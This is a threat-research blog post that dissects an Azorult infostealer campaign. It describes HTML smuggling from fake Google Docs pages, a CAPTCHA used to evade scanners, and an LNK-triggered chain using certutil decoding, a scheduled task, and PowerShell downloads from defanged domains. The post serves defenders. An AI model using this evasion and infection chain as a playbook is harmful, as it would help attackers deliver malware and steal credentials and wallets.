Summary
Netskope Threat Labs has observed an evasive Azorult campaign in the wild that employs multiple defense evasion techniques from delivery through execution to fly under the defender’s radar as it steals sensitive data.
Azorult is an information stealer first discovered in 2016 that steals sensitive information including user credentials, browser information, and crypto wallet data. Azorult is on the rise and is currently one of the top malware families that Netskope Threat Labs has observed targeting the healthcare industry over the last year.
In this blog post, Netskope Threat Labs performs a detailed teardown of an evasive AzoruIt malware campaign we observed in the wild. This campaign is noteworthy for the following reasons:
- It delivers its initial payload through HTML smuggling, a detection evasion technique that is gaining popularity among adversaries. This defense evasion technique was also used by a nation-state group to smuggle a remote access trojan, and by Nokoyawa ransomware, where they started the infection process through HTML smuggling.
- It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website.
- It executes the fileless Azorult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts.
- It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.
- It steals sensitive data, including information for 137 distinct crypto wallets, login credentials, browser files, and important documents.
Google Sites serves as a decoy for HTML smuggling
HTML smuggling is a defense evasion technique that aims to bypass web controls that block risky file types. It abuses legitimate HTML5 download attributes and Javascript blobs to construct malicious payloads on the client side, bypassing network security filters.
As part of Netskope Threat Labs’ threat hunting activities, we uncovered a campaign wherein an attacker created fake Google Docs pages on Google Sites from which they used HTML smuggling to download malicious payloads. They lure their victims to the fake Google Docs pages to trick them into believing the downloaded file was from Google Docs. In most cases that we see in the wild, the adversary embeds the smuggled malicious payload in the Javascript itself. In this example, the adversary embedded the malicious payload in a separate JSON file as a BASE64 encoded string. When the victim accesses the website, it sends a GET request to download the JSON file from a separate domain (mahmudiyeresort[.]com[.]tr
) and extracts the payload from there.
Smuggling With A Captcha
Usually, when a victim accesses a website that uses HTML smuggling to deliver malicious payloads, the payload is downloaded immediately. For this campaign, the attacker’s website hosted on Google Sites initiates a CAPTCHA, which serves as an additional layer of protection against URL scanners. This helps the HTML file to remain undetected in public scanners like Virustotal, which cannot proceed past the CAPTCHA.
Malicious shortcut downloading multiple Powershell and Javascripts
Once the user passes the CAPTCHA test, the HTML smuggling Javascript code reconstructs the payload and downloads it to the victim’s machine. The payload is an LNK shortcut file that uses a PDF icon to trick users into clicking it. Clicking on the LNK file kicks off the following chain of events.
- The LNK file spawns a command prompt where it saves a base64 encoded Powershell command to a batch file named
Fyap4cKJ.bat
- The Powershell command is then decoded using a Windows native application named
certutil.exe
and overwritesFyap4cKJ.bat
- It then creates a scheduled task named
t09pxsrXKG
that executes the batch fileFyap4cKJ.bat
. - The batch file
Fyap4cKJ.bat
will execute a Powershell script that usesInvoke-WebRequest
to download a PHP file fromsqjeans[.]com
and saves it asqtoW0vI2.js
in the temp folder. It will then executeqtoW0vI2.js
usingwscript.exe
. - The Powershell command from the batch file
Fyap4cKJ.bat
then deletes the scheduled taskt09pxsrXKG
created earlier.
The Javascript qtoW0vI2.js
then performs the following three tasks:
- Copies itself in the
%ProgramData%
, and renames itself asagent.js
- Checks and deletes itself if a file named
7z52OJFPXT4J
exists in the temp folder. - Downloads two Powershell scripts named
agent1.ps1
andagent3.ps1
usingInvoke-WebRequest
, and executes them usingInvoke-Expression
.